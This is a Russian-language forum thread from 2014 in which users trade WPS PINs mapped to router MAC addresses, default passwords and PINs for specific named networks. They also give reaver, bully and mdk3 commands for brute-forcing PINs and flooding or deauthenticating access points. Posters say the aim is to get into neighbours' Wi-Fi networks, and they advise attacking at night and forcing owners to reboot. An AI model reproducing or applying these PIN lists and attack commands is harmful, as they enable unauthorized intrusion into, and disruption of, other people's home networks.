B0:B2:DC:A9:90:CE 1112654 -10000000
90:94:E4:F3:BA:DE 5973086 -10000000
B0:B2:DC:A9:90:CE 1112654 -10000000
F4:6D:04:A0:04:28 0486824 -10000000
90:E6:BA:BE:8F:9F 2488607 -10000000
90:E6:BA:BE:C7:79 2502905 -10000000
90:E6:BA:BE:D2:E0 2505824 -10000000
90:E6:BA:BE:90:C3 2488899 -10000000
90:E6:BA:BE:C4:62 2502114 -10000000
F4:6D:04:9F:FD:B8 0485176 -10000000
20:CF:30:99:10:6C 0031212 -10000000
20:CF:30:99:12:48 0031688 -10000000
20:CF:30:99:37:81 0041217 -10000000
20:CF:30:98:FB:47 0025799 -10000000
20:CF:30:99:0F:A2 0031010 -10000000
20:CF:30:99:0F:FB 0031099 -10000000
20:CF:30:99:40:9B 0043547 -10000000
20:CF:30:99:59:A7 0049959 -10000000
20:CF:30:D6:0F:F1 4028785 -10000000
20:CF:30:99:3A:9D 0042013 -10000000
20:CF:30:99:3C:B2 0042546 -10000000
20:CF:30:99:40:13 0043411 -10000000
20:CF:30:98:FA:89 0025609 -10000000
20:CF:30:98:A5:51 0003793 -10000000
20:CF:30:98:A5:AB 0003883 -10000000
20:CF:30:98:A6:07 0003975 -10000000
E0:CB:4E:E4:B7:D8 4989272 -10000000
E0:CB:4E:E4:9C:88 4982280 -10000000
20:CF:30:98:A5:19 0003737 -10000000
20:CF:30:98:E7:6F 0020719 -10000000
20:CF:30:98:F3:69 0023785 -10000000
20:CF:30:98:F8:8A 0025098 -10000000
20:CF:30:98:A6:1B 0003995 -10000000
20:CF:30:98:C0:AF 0010799 -10000000
20:CF:30:98:E0:36 0018870 -10000000
20:CF:30:D6:10:23 4028835 -10000000
48:5B:39:BC:74:F7 2350711 -10000000
48:5B:39:BC:01:A6 2321190 -10000000
48:5B:39:BB:F8:4E 2318798 -10000000
48:5B:39:BD:12:9C 2391068 -10000000
48:5B:39:BD:0D:7C 2389756 -10000000
48:5B:39:BD:0A:A0 2389024 -10000000
C8:60:00:D4:74:20 3923360 -10000000
C8:60:00:D4:DC:40 3950016 -10000000
CC:5D:4E:99:5A:80 0050176 -10000000
48:5B:39:BB:CC:71 2307569 -10000000
34:08:04:DC:5A:C8 4441160 -10000000
34:08:04:DC:5A:C8 4441160 -10000000
48:5B:39:BD:13:14 2391188 -10000000
00:66:4B:E6:43:F0 5090672 -10000000
20:CF:30:D6:7D:5E 4056798 -10000000
20:CF:30:D6:85:82 4058882 -10000000
00:66:4B:E6:3D:B0 5089072 -10000000
00:66:4B:E6:40:F0 5089904 -10000000
00:66:4B:E6:41:C0 5090112 -10000000
20:CF:30:D6:91:13 4061843 -10000000
20:CF:30:EF:77:74 5693684 -10000000
48:5B:39:BD:31:68 2398952 -10000000
20:CF:30:D6:88:D4 4059732 -10000000
20:CF:30:D6:8B:4F 4060367 -10000000
20:CF:30:D6:8C:6D 4060653 -10000000
00:24:8C:CD:8E:EA 3471466 -10000000
00:24:8C:CE:3B:7F 3515647 -10000000
00:24:8C:CE:42:F8 3517560 -10000000
00:26:18:D8:C8:E7 4207207 -10000000
00:26:18:EC:D4:64 5520868 -10000000
00:26:18:D9:00:F5 4221557 -10000000
00:24:8C:CD:7E:CA 3467338 -10000000
48:5B:39:FA:74:18 6413720 -10000000
48:5B:39:FA:75:A0 6414112 -10000000
48:5B:39:FA:76:B4 6414388 -10000000
48:5B:39:FA:71:B8 6413112 -10000000
48:5B:39:FA:7C:98 6415896 -10000000
EC:23:3D:CD:DD:E0 3491680 -10000000
00:26:18:D8:C4:15 4205973 -10000000
EC:23:3D:BC:6A:30 2347952 -10000000
E0:CB:4E:E5:33:DA 5021018 -10000000
E0:CB:4E:E5:24:55 5017045 -10000000
E0:CB:4E:E5:35:1D 5021341 -10000000
E0:CB:4E:ED:BB:DC 5580124 -10000000
E0:CB:4E:ED:88:B8 5567032 -10000000
E0:CB:4E:E4:DD:8B 4998923 -10000000
E0:CB:4E:E4:BD:4D 4990669 -10000000
E0:CB:4E:E4:FF:17 5007511 -10000000
E0:CB:4E:E5:11:EB 5012331 -10000000
E0:CB:4E:E5:09:FE 5010302 -10000000
E0:CB:4E:EE:01:04 5597828 -10000000
00:26:18:EC:D7:BC 5521724 -10000000
E0:CB:4E:EE:52:54 5618644 -10000000
E0:CB:4E:EE:46:8C 5615628 -10000000
30:85:A9:F5:0E:A4 1409572 -14650496
30:85:A9:F5:13:5C 1410780 -14650496
30:85:A9:F5:29:38 1416376 -14650496
10:BF:48:4B:49:00 2893440 -2040448
10:BF:48:4A:23:60 2818272 -2040448
10:BF:48:4A:23:7C 2818300 -2040448
10:BF:48:4B:34:9C 2888220 -2040448
00:07:26:3E:FC:C5 1662149 -2465792
00:07:26:4A:AA:48 2427464 -2465792
F4:6D:04:A1:F8:64 7723748 -2891136
F4:6D:04:A1:C4:C8 7710536 -2891136
F4:6D:04:A2:37:A8 7739944 -2891136
F4:6D:04:A2:58:70 7748336 -2891136
00:66:4B:2A:6B:D0 2780108 -4
00:66:4B:2A:67:80 2779004 -4
08:7A:4C:25:3F:30 2441004 -4
80:1F:02:A3:91:A2 4274082 -6445568
80:1F:02:A2:5B:26 4194598 -6445568
80:1F:02:A3:87:90 4271504 -6445568
08:7A:4C:24:66:50 2385480 -8
00:66:4B:2A:6E:10 2780680 -8
50:46:5D:AF:89:D0 1785168 -9718912
50:46:5D:AF:3D:A0 1765664 -9718912
50:46:5D:B0:4E:78 1835512 -9718912
50:46:5D:AF:8B:44 1785540 -9718912
50:46:5D:AF:3D:98 1765656 -9718912
50:46:5D:AE:C9:2C 1735852 -9718912
50:46:5D:AE:AC:38 1728440 -9718912
50:46:5D:AE:DF:10 1741456 -9718912
50:46:5D:AE:C9:3C 1735868 -9718912
И здесь ТЫЦ
henri2002
06.08.2014, 11:30
Мои ПИНЫ
у EDIMAX-ов с маком такого типа 80:1F:02:4F:39:A8
берется не 3-и , а 4-е последних цифр из мака, после певода в 16 в 10 из результата берется последние 7-мь цифр.
Решил перейти с reaver на bully, как на более свежую утилиту. Следую за прогрессом. Подскажите: кто какие параметры использует?
PS: я пока что голый использую: bully mon0 -b XX:XX:XX:XX:XX:XX
Vikhedgehog
10.08.2014, 02:58
Доброго времени суток, у меня есть важная информация!
Недавно я писал, что билайн SMART боксы отсылают фальшивый WSC NACK в ответ на M4 даже при указании верного PIN кода. Оказалось, что это происходит только при использовании опции -S (ускорение атаки за счет уменьшенного размера пакетов), большинство роутеров проглатывают такие пакеты нормально, но некоторый китайский хлам типа sercomm этого не любит. Так что большинство проблем зацикливания ривера на 90% вызвано именно опцией -S
Доброго времени суток, у меня есть важная информация!
Недавно я писал, что билайн SMART боксы отсылают фальшивый WSC NACK в ответ на M4 даже при указании верного PIN кода. Оказалось, что это происходит только при использовании опции -S (ускорение атаки за счет уменьшенного размера пакетов), большинство роутеров проглатывают такие пакеты нормально, но некоторый китайский хлам типа sercomm этого не любит. Так что большинство проблем зацикливания ривера на 90% вызвано именно опцией -S
хорошо бы еще знать алгоритм генерации пинов,а то кроме билайна этот sercomm использует еще и мгтс,добровольно-принудительно подключая gpon....пробовал перебирать,но после 5 пинов точка лочится на несколько недель
этот sercomm использует еще и мгтс
Не помню где нашел для мгтс.
7C:038 sercomm
Для старых прошивок такая картина:
Код:
4C:17:EB:XX:XX:XX
E8:F1:B0:XX:XX:XX
C0:AC:54:XX:XX:XX
используются пины: 46264848, 76229909, 21464065, 13585907
Для новых (2013 и более) картинка хуже
Код:
7C:038:XX:XX:XX - 10864111
D8:6C:E9:XX:XX:XX - ????????
2C:39:96:XX:XX:XX - ????????
3C:818:XX:XX:XX - ????????
binarymaster
10.08.2014, 18:28
Для старых прошивок такая картина:
Код:
4C:17:EB:XX:XX:XX
E8:F1:B0:XX:XX:XX
C0:AC:54:XX:XX:XX
используются пины: 46264848, 76229909, 21464065, 13585907
Для новых (2013 и более) картинка хуже
Код:
7C:038:XX:XX:XX - 10864111
D8:6C:E9:XX:XX:XX - ????????
2C:39:96:XX:XX:XX - ????????
3C:818:XX:XX:XX - ????????
Это D-Link же
Есть ли аналог pinwps для windows? или хоть какая нибудь программа с базой пин кодов и несколькими генераторами?
Не помню где нашел для мгтс.
7C:038 sercomm
Для старых прошивок такая картина:
Код:
4C:17:EB:XX:XX:XX
E8:F1:B0:XX:XX:XX
C0:AC:54:XX:XX:XX
используются пины: 46264848, 76229909, 21464065, 13585907
Для новых (2013 и более) картинка хуже
Код:
7C:038:XX:XX:XX - 10864111
D8:6C:E9:XX:XX:XX - ????????
2C:39:96:XX:XX:XX - ????????
3C:818:XX:XX:XX - ????????
мне 00:0E:8F нужен (sercomm rv6688)
Vikhedgehog
11.08.2014, 01:24
хорошо бы еще знать алгоритм генерации пинов,а то кроме билайна этот sercomm использует еще и мгтс,добровольно-принудительно подключая gpon....пробовал перебирать,но после 5 пинов точка лочится на несколько недель
Интересно, используют ли билайн и мгтс один и тот же алгоритм для генерации пин кодов? Я думаю что нет, но пока никто точно сказать не может.
Vikhedgehog
22.08.2014, 16:20
Сегодня при скане нашел два DIR-300 с почти идентичными мак адресами, только последние значения мак адреса различаются (видимо учереждение какое-то), так пин коды у них все равно совсем разные!
F0:7D:68:9C:BA:DA = 27278284
F0:7D:68:9C:BA:D2 = 80411239
binarymaster
22.08.2014, 16:31
Не везёт с D-Link DIR-300...
А я обнаружил интересный факт, когда проектировал новый парсер для роутеров TP-LINK. Поскольку сейчас у меня есть возможность декодировать файлы конфигурации, я могу исследовать их параметры.
Так вот, ни в одном из файлов конфигурации я не находил параметров, относящихся к PIN-коду WPS. При этом, в админке пин код был. А это значит, либо пин-код генерируется по какому-то алгоритму, либо случайным образом. А затем хранится в NVRAM, но не сохраняется в конфиг.
Vikhedgehog
22.08.2014, 17:39
Мне кажется, что код генерируется при первой загрузке после ресета. Если например, прошить роутер с DD-WRT, а потом обратно, точка находит свой старый пин код, а ведь при перепрошивке или ресете, nvram стирается и записывается по новой насколько я понимаю. По-моему, единственное что невозможно или очень трудно стереть - мак адрес интерфейса LAN/WAN (исключение: DIR-320 со своим 00:90:4C:C1:00:00), ну и может серийник, не знаю где его хранят, из этого только и можно сгенерировать WPS код.
henri2002
22.08.2014, 20:41
Мне кажется, что код генерируется при первой загрузке после ресета. Если например, прошить роутер с DD-WRT, а потом обратно, точка находит свой старый пин код, а ведь при перепрошивке или ресете, nvram стирается и записывается по новой насколько я понимаю. По-моему, единственное что невозможно или очень трудно стереть - мак адрес интерфейса LAN/WAN (исключение: DIR-320 со своим 00:90:4C:C1:00:00), ну и может серийник, не знаю где его хранят, из этого только и можно сгенерировать WPS код.
возможно он хранится в еепроме ( 8-и ножки ), или в отп зоне флешки.
Vikhedgehog
22.08.2014, 23:19
Блин, теперь с асусами еще хуже дела. Раньше они просто лочились, и лок уходил через некоторое время (в зависимости от количества неправильных пинов), так хоть тоже нихрена не взломаешь, но теперь новые (мак D8:50:E6) вообще отключают wps (наподобие кинетиков), но в отличие от кинетиков wps не включается после перезагрузки, надо ждать когда хозяин влезет в веб морду и включит (скорее всего такое не случится). Хотелось бы от этой фигни алгоритм узнать, тут почти у всех асусы
Можно долбить по роутеру с mdk3 и караулить всю ночь, пока хозяин ее не резетит, тогда она станет называться ASUS и шифрование отключится, будет около двух минут чтоб влезть в настройки (учетная запись admin/admin) и заскринить wps код, но возиться с этим не хочется, да и людей жалко. Может есть смысл создать базу для wps кодов, насканенных с роутер сканом? Тогда можно будет поискать всякие алгоритмы.
binarymaster
23.08.2014, 00:15
но теперь новые (мак D8:50:E6) вообще отключают wps (наподобие кинетиков), но в отличие от кинетиков wps не включается после перезагрузки
Омг
Может есть смысл создать базу для wps кодов, насканенных с роутер сканом? Тогда можно будет поискать всякие алгоритмы.
В соседней теме по Router Scan (а может и тут тоже) такое уже пытались практиковать, но пока результаты особо не впечатляют. Поищи посты пользователя VladimirV, у него вроде были интересные наблюдения.
Vikhedgehog
23.08.2014, 01:24
В соседней теме по Router Scan (а может и тут тоже) такое уже пытались практиковать, но пока результаты особо не впечатляют. Поищи посты пользователя VladimirV, у него вроде были интересные наблюдения.
Да это я помню, мы тогда еще выяснили что у RT-G32 используется алгоритм hex-dec, жалко у них по умолчанию wps выключен и включается только на пару минут, тут еще полно этого старья ловится
А из соотношений BSSID-PIN для новых асусов я еще ни разу не видел чтоб в списке попадались почти идентичные мак адреса, так что и идентичных PIN кодов не должно быть, я забил на дальнейший поиск, когда узнал что они лочатся даже при верной первой части пин кода, но видимо ослабление безопасности у wps ждать нечего, так что может стоить еще поискать. С TP-LINK тоже бы хорошо разобраться, но их мало.
saimonyz
23.08.2014, 04:09
вот может кто поймёт алгоритм
C0:4A:00:C9:52:44 72488997
C0:4A:00D:9B:A4 16803060
C0:4A:007:30:AE 15174178
C0:4A:006:91:00 64340135
Сколько роутеров я встречал, у большинства пин код высчитывает сама прошивка, так как в дампе флешки ничего похожего на пин близко не было. Если бы на форуме сидели люди, которые умеют копать прошивки, нам бы проще было. А по теме, у меня накопилось уйма данных с роутеров тп линк и асус, но там и близко нет ничего похожего на какие-то человечные алгоритмы - 2 почти идентичных мака, а разброс между пинами может быть как 6 миллионов так и 1.
скажите,у кого удавалось какой то комбинацией заставить точку разлочить wps и дать возможность перебирать дальше?и что это за комбинация?Где то что то тут на форуме видел,но где
И вообще,работает ли комбинация какая нибудь против лока wps?
Сейчас просто уже буквально каждая точка лочится,не лочаться старые точки со старыми прошивками,таких точек уже и в эфире то нет
Как Вы снимаете лок точки,какие комбинации есть?
Vikhedgehog
24.08.2014, 02:14
скажите,у кого удавалось какой то комбинацией заставить точку разлочить wps и дать возможность перебирать дальше?и что это за комбинация?Где то что то тут на форуме видел,но где
И вообще,работает ли комбинация какая нибудь против лока wps?
Сейчас просто уже буквально каждая точка лочится,не лочаться старые точки со старыми прошивками,таких точек уже и в эфире то нет
Как Вы снимаете лок точки,какие комбинации есть?
mdk3 mon0 a -a
Это заставляет некоторые TP-LINKи перезагрузить вайфай, используй только если точка не рассылает дату (хозяин не пользуется, хорошее время - от 2 до 6 часа ночи в будний день, а так стоит последить с аиродампом), иначе он ее нахрен выкинет и поставит какой нидь роутер типа асуса который вообще не взломаешь по wps.
mdk3 mon0 a -a <bssid>
Это заставляет некоторые TP-LINKи перезагрузить вайфай, используй только если точка не рассылает дату (хозяин не пользуется, хорошее время - от 2 до 6 часа ночи в будний день, а так стоит последить с аиродампом), иначе он ее нахрен выкинет и поставит какой нидь роутер типа асуса который вообще не взломаешь по wps.
а....т.е всё таки асусы не реально? та и тп линки я так понял не все поддаются
Vikhedgehog
24.08.2014, 15:00
а....т.е всё таки асусы не реально? та и тп линки я так понял не все поддаются
Не зная алгоритма - нереально. Из TP-LINK поддаются все TL-WR841ND, возможно некоторые TL-WR741ND/740N, эти модели всех чаще покупают. Еще у меня сработало на репитере TL-WA850RE, на более мощных моделях типа линейки TL-WDR не срабатывает, но они редко встречаются, так как из дорогих роуеров люди обычно предпочитают асус или zyxel кинетик, а из дешевых - DLink, TP-LINK и TRENDnet. Кстати, на тренднетах я еще не видел wps лока И до сих пор тут иногда появляются сетки от данного производителя, с включенным WEP шифрованием
незнаю....у меня эта команда не работает,кучу клиентов вешает и пофиг ни какая точка не перезагружается
на тренднетах я еще не видел wps лока
как и правильного пина...
у меня все заканчивалось тем,что reaver долбит один тот же пин
как и правильного пина...
у меня все заканчивалось тем,что reaver долбит один тот же пин
ну а всё таки,есть команда\комбинация,при которой и ривер работает и dos точки,т.е что при дос снимал лок,а ривер дальше перебирал?mdk3 что то не действует...
А вообще было бы супер,если бы команда была,при которой ресет происходил бы,без участия хозяина,т.е точка открытая бы становилась
Vikhedgehog
25.08.2014, 01:03
как и правильного пина...
у меня все заканчивалось тем,что reaver долбит один тот же пин
Ты случайно не используешь опцию -S? Если да, то убери.
Ты случайно не используешь опцию -S? Если да, то убери.
не использую,с тренднетами не только у меня проблемы
Vikhedgehog
25.08.2014, 02:12
ну а всё таки,есть команда\комбинация,при которой и ривер работает и dos точки,т.е что при дос снимал лок,а ривер дальше перебирал?mdk3 что то не действует...
А вообще было бы супер,если бы команда была,при которой ресет происходил бы,без участия хозяина,т.е точка открытая бы становилась
В феврале-марте этого года в этой теме кто-то постил скрипт именно для этого.
А единственный способ сделать резет не имея доступ к настройкам или вайфаю - влезть в хату соседа пока он в отпуске и нажать кнопку резета у роутера на 10 секунд, по другому никак
binarymaster
25.08.2014, 03:13
http://habrahabr.ru/post/234359/
Наверняка скоро придумают способ доставать WPA/WPA2 ключ таким же способом. Ранее где-то читал, что может быть даже удалённо, если снимать звуковые данные на высокой частоте (либо на низкой, но с применением Audio Super Resolution).
Vikhedgehog
25.08.2014, 04:43
http://habrahabr.ru/post/234359/
Наверняка скоро придумают способ доставать WPA/WPA2 ключ таким же способом. Ранее где-то читал, что может быть даже удалённо, если снимать звуковые данные на высокой частоте (либо на низкой, но с применением Audio Super Resolution).
Не совсем понял, надо будет подлезать к Ethernet кабелю что-ли?
не использую,с тренднетами не только у меня проблемы
По моим наблюдениям, к ним лучше стучаться используя bully, а не reaver.
пытаюсь подобрать пин для netgeara (модель JNR3210-1NNRUS...предоставлен онлаймом),все шло нормально,после 10 пинов лочился на 4 минуты,потом опять перебирал,так дошел до 89% и началось...
Trying pin:98205677
WARNING:25 successive start failures...и такая хрень уже несколько часов,кто что делает в такой ситуации?
(если кто-то уже ломал этот роутер,пожалуйста подскажите пин или получившийся пароль..)
Vikhedgehog
25.08.2014, 11:42
пытаюсь подобрать пин для netgeara (модель JNR3210-1NNRUS...предоставлен онлаймом),все шло нормально,после 10 пинов лочился на 4 минуты,потом опять перебирал,так дошел до 89% и началось...
Trying pin:98205677
WARNING:25 successive start failures...и такая хрень уже несколько часов,кто что делает в такой ситуации?
(если кто-то уже ломал этот роутер,пожалуйста подскажите пин или получившийся пароль..)
Сам на днях ломал подобный роутер. Таймаут EAPOL запросов тоже был, это роутер не выдержал и у него wps завис, надо ждать когда хозяин перезагрузит. Такие зависания происходят не часто. Кстати можно воспользоваться опцией -r 9:60 к примеру, тогда ривер остановится за 1 пин до лока, а через минуту точка как правило забывает про атаку. А еще ни в коем случае не используй -S, иначе зависнет на 90%
Сам на днях ломал подобный роутер. Таймаут EAPOL запросов тоже был, это роутер не выдержал и у него wps завис, надо ждать когда хозяин перезагрузит. Такие зависания происходят не часто. Кстати можно воспользоваться опцией -r 9:60 к примеру, тогда ривер остановится за 1 пин до лока, а через минуту точка как правило забывает про атаку. А еще ни в коем случае не используй -S, иначе зависнет на 90%
спасибо за ответ,а в таком состоянии к нему могут цепляться клиенты? а то боюсь перегзагрузка будет очень не скоро...пробовал mdk3.но толку от его нет.....вроде бы вешает десятки тысяч клиентов,а точка как работала так и работает (вообще интересная софтина,даже если ввести несуществующий mac,он будет на нее вешать клиентов)
В феврале-марте этого года в этой теме кто-то постил скрипт именно для этого.
А единственный способ сделать резет не имея доступ к настройкам или вайфаю - влезть в хату соседа пока он в отпуске и нажать кнопку резета у роутера на 10 секунд, по другому никак
где ж этот скрипт найти?ты его пробовал?эффективный?
Vikhedgehog
25.08.2014, 13:55
спасибо за ответ,а в таком состоянии к нему могут цепляться клиенты? а то боюсь перегзагрузка будет очень не скоро...пробовал mdk3.но толку от его нет.....вроде бы вешает десятки тысяч клиентов,а точка как работала так и работает (вообще интересная софтина,даже если ввести несуществующий mac,он будет на нее вешать клиентов)
Не знаю насчет этого. У самого есть старый нетгир с неработающим wps локом, роутер начинает греться и прожигать стол уже через пару часов, wps иногда зацикливается на какой-то ошибке типа отсутствие пакета M1 или M3, барахло какое-то они выпускают в общем) А соседи обычно перезагружают сеть через каждые 4-5 дней.
mdk3 mon0 a -a лучше на целый день не оставлять, тк нагрузка на адаптер великая, быстрее сломается. Лучше используй mdk3 mon0 g -t - команда будет неспеша выгонять клиентов, отсылающих к точке WPA пакеты. У хозяина будет ужасно тормозить инет и он перезагрузит точку, только тут надо за прогой следить, а то хозяин может и вовсе сменить роутер. Вообще это команда предназначена для понижение защиты точки до WEP, то есть у хозяина из-за mdk3 начинает глючить сетка, он меняет шифрование, а прога игнорит WEP пакеты и он может продолжать сидеть в инете. По-моему идея плохая, ведь немногие знают существование разных видов шифрования, а те кто знают, скорее всего откажутся ставить WEP.
Не знаю насчет этого. У самого есть старый нетгир с неработающим wps локом, роутер начинает греться и прожигать стол уже через пару часов, wps иногда зацикливается на какой-то ошибке типа отсутствие пакета M1 или M3, барахло какое-то они выпускают в общем
ну эта модель вроде как не очень старая
Лучше используй mdk3 mon0 g -t <bssid> - команда будет неспеша выгонять клиентов, отсылающих к точке WPA пакеты. У хозяина будет ужасно тормозить инет и он перезагрузит точку, только тут надо за прогой следить, а то хозяин может и вовсе сменить роутер.
спасибо,попробую....только пока к точке никто не подключается
mdk3 mon0 a -a лучше на целый день не оставлять, тк нагрузка на адаптер великая, быстрее сломается.
спасибо...я сейчас именно эту команду использовал...что интересно,моя точка находится на 13 канале,их на 9 и во время работы mdk3 у меня начал ужасно тормозить инет,скорость снизилась до 1 мбит/c,долго думал в чем дело,а потом вспомнил про mdk3,закрыл и скорость моего интернета поднялась до 25 мбит/c....что это было?
Vikhedgehog
25.08.2014, 14:19
ну эта модель вроде как не очень старая
спасибо,попробую....только пока к точке никто не подключается
спасибо...я сейчас именно эту команду использовал...что интересно,моя точка находится на 13 канале,их на 9 и во время работы mdk3 у меня начал ужасно тормозить инет,скорость снизилась до 1 мбит/c,долго думал в чем дело,а потом вспомнил про mdk3,закрыл и скорость моего интернета поднялась до 25 мбит/c....что это было?
mdk3 полностью забивает канал запросами на аутентификацию. А если у твоего WiFi скорость 300 мбит/c - он работает на двух каналах. Если основной канал - 9, то второй как раз 13. Если основной канал 1 - то второй 5 и тд... Эту функцию можно отключить, сменив в настройках ширину канала с 40 МГц или автоматического режима на 20 МГц, но тогда скорость упадет до 150 мбит/c.
binarymaster
25.08.2014, 14:39
Не совсем понял, надо будет подлезать к Ethernet кабелю что-ли?
Как вариант, да. Либо к шасси роутера (т.е. к любой проводящей поверхности, связанной с роутером).
Но я говорил, что где-то читал статью, что высокочастотный звук также можно снимать наравне с электроимпульсами. Если найду, скину ссылку.
Vikhedgehog
25.08.2014, 14:56
Можно будет собрать радиоуправляемого летающего жучка чтоб ночью пролетел через вентиляционный проход и дотронулся до роутера))
binarymaster
25.08.2014, 15:08
Можно будет собрать радиоуправляемого летающего жучка чтоб ночью пролетел через вентиляционный проход и дотронулся до роутера))
Просто дотронуться мало, нужно какое-то время собирать информацию. Ну и конечно, чтобы в это время были активные Wi-Fi клиенты
Беспроводной сетевой адаптер Qualcomm Atheros AR9285
Подойдёт такая карта для брута ?
binarymaster
25.08.2014, 17:38
Ethernet-контроллер
для брута ?
WAT?
Вы бы хоть уточнили для какого брута.
daemon_mors
25.08.2014, 18:19
WAT?
Вы бы хоть уточнили для какого брута.
Наверное имелось введу WPS...
та уже на каждой точке wps лочится,скрипт нужен,при котором перебор опять возобнавляется...
binarymaster, сорри, не то скопировал. Да, для брута wpa.
Беспроводной сетевой адаптер Qualcomm Atheros AR9285
Подойдет на 100%, сам таким пользовался.
binarymaster, сорри, не то скопировал. Да, для брута wpa.
Для брута wpa вообще wifi карта не нужна, нужна хорошая видеокарта, выражайся яснее
mdk3 mon0 g -t <bssid> .
попробовал на одной точке тормозов не заметил,как будто ничего и не происходит (подключен я и хозяин сетки)
сама прога пишет "did not receive any beacons"(mac указан верно) в строке speed все по нулям (команду запустил когда и он и я были подключены)
Vikhedgehog
26.08.2014, 00:43
попробовал на одной точке тормозов не заметил,как будто ничего и не происходит (подключен я и хозяин сетки)
сама прога пишет "did not receive any beacons"(mac указан верно) в строке speed все по нулям (команду запустил когда и он и я были подключены)
Адаптер на нужном канале?
Адаптер на нужном канале?
в смысле на нужном канале? команда ведь не предусматривает указание канала
Vikhedgehog
26.08.2014, 01:17
в смысле на нужном канале? команда ведь не предусматривает указание канала
Нужно перед этим с помощью опции -c в аиродампе перевести адаптер на нужный канал.
Нужно перед этим с помощью опции -c в аиродампе перевести адаптер на нужный канал.
можете команду написать? а то я не совсем понимаю как это сделать
EE:43:F6:02:BA:88
походу ZyXEL Keenetic какой то. подскажите какой может быть пин от этого чуда? спасибо.
Vikhedgehog
26.08.2014, 02:15
можете команду написать? а то я не совсем понимаю как это сделать
airodump-ng mon0 -c 13 например.
EE:43:F6:02:BA:88
походу ZyXEL Keenetic какой то. подскажите какой может быть пин от этого чуда? спасибо.
0178824
где ж такой скрипт,при котором и ривер включен и mdk3,что бы точка перезагружалась а ривер сразу же перебирал пины?Но что то не верю в эффективность такой комбинации....Сколько mdk3 пробовал на разные точки,точкам пофиг,миллионы клиентов вещаются и ничего
а кто нибудь имел дело с Upvel UR-315BN? там WPS блокируется на всегда или как? я жду уже трети сутки, а он все Locked висит. mdk3 не помогает
а кто нибудь имел дело с Upvel UR-315BN? там WPS блокируется на всегда или как? я жду уже трети сутки, а он все Locked висит. mdk3 не помогает
подключайся по пину 99956042 или 20854836...дождись только когда lock снимется
подключайся по пину 99956042 или 20854836...дождись только когда lock снимется
да, я эти пины здесь уже находил, после того как WPS локнулся за попытку перебора. теперь вот жду пока разлочится, но будет ли это вообще
та wps уже вообще не актуально,сейчас уже такие роутеры и прошивки,что взлом по wps гиблое дело,и mdk3 фигня,на какие роутеры действует,непонимаю..
а что актуально, брутить хендшейки?) не смеши.
да, я эти пины здесь уже находил, после того как WPS локнулся за попытку перебора. теперь вот жду пока разлочится, но будет ли это вообще
имя сети можешь написать?
имя сети можешь написать?
да, Upvel_3c23
по умолчанию пароль 87654321,еще может быть upvel123...может хозяин не сменил
по умолчанию пароль 87654321,еще может быть upvel123...может хозяин не сменил
не, не походит, да и хендшейк брутить пробовал уже, безрезультатно.
теперь вопрос к знатокам пинов - TP-LINK_7BEBFE E8:94:F6:7B:EB:FE какой тут пин может быть? ставить на полный перебор не вижу смысла, т.к. просто в лок уйдет и всё. может есть какой нибудь алгоритм для тп-линков?
Сами ищем алгоритм. Пока что ни один из тп линков не генерируется.
у кого нибудь получалось успешно юзать mdk3? я поставил долбить точку с трех устройств сразу, но она и не думает падать, эта штука рабочая вообще?
да, я эти пины здесь уже находил, после того как WPS локнулся за попытку перебора. теперь вот жду пока разлочится, но будет ли это вообще
а что актуально, брутить хендшейки?) не смеши.
я не говорю что хендшейки,просто wps это уже прошлый век,производители точек уже эту дыру закрыли(новые точки,новые прошивки)Сейчас можно старючий роутер со сторючей прошивкой взломать Что смешного я говорю?Это реальность...
та у тп линков какой угодно пин может быть,при чём тут алгоритм,это вам не кенетики и у тп линков пин самому можно ставить,какой хочешь не угадаеш,та и лочатся они все....
Короче.....wps уже не реально взламывать из за новых прошивок,ну или пару лет так взламывать придёться
я не говорю что хендшейки,просто wps это уже прошлый век,производители точек уже эту дыру закрыли(новые точки,новые прошивки)Сейчас можно старючий роутер со сторючей прошивкой взломать Что смешного я говорю?Это реальность...
не все) д-линки помоему ничего не закрывали и не будут. я никогда не видел, чтобы у них была закрыта эта "дыра", а DSL-2460NRU вообще все с одним пином идут, коих у меня тут очень много
у кого нибудь получалось успешно юзать mdk3? я поставил долбить точку с трех устройств сразу, но она и не думает падать, эта штука рабочая вообще?
ну допустим,упадёт она.....дальше что? и как ты увидешь,что упала? ну допустим перебор опять продолжится,но так опять 10 пинов и лок,опять долбить mdk3.так годами можно ,так и хозяин заметит,что глюки какие то
ну допустим,упадёт она.....дальше что? и как ты увидешь,что упала? ну допустим перебор опять продолжится,но так опять 10 пинов и лок,опять долбить mdk3.так годами можно ,так и хозяин заметит,что глюки какие то
да блин, я знаю пин уже, но не могу подключится потому что там лок на wps, вот в чем дело, мне нужно как то заставить точку уйти в ребут.
пипец!вон оно что так бы и сказал ну считай тебе уже везёт,99% дела сделано
А вот когда только начинаешь так перебирать.это дело гиблое,ну или 100 лет взламывать,лочатся и всё,и mdk3 фигня,у меня тоже ничего никакой точки ничего не причиняет или супер команда должна быть,вот ты какую задаёшь?
mdk3 mon0 a -a 01:02:03:04:05:06
вот так пытался, причем с трех устройств сразу, и ничего. еще пытался юзать такую mdk3 mon0 g -t 01:02:03:04:05:06 но тогда вообще ничего не происходит, пишет что не может достучатся до точки. да и хрен бы с ним, подождал бы, но лок кажется завис на мертво, уже больше 2х суток висит. вот и пытаюсь что нибудь сделать, но ничего не получается.
Люди!кто знает команду,пробовал такую команду,при которой автоматом долбит точку,при которой она часто перезагружается и в то же время работает ривер или булли?Напишите пожайлуста такую команду,думаю её тут все хотят(такую команду) а то есть куча сладких точек,с супер сигналом,а wps залочен,обидно ж
А вообще нужна б другая суперкоманда,при которой точка резетнет.т.е открытая станет Вот эта команда будет на вес золота много ж информации быстро с точки списать можно будет,та и много чего
Такая команда есть, называется "дерни соседу рубильник"
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot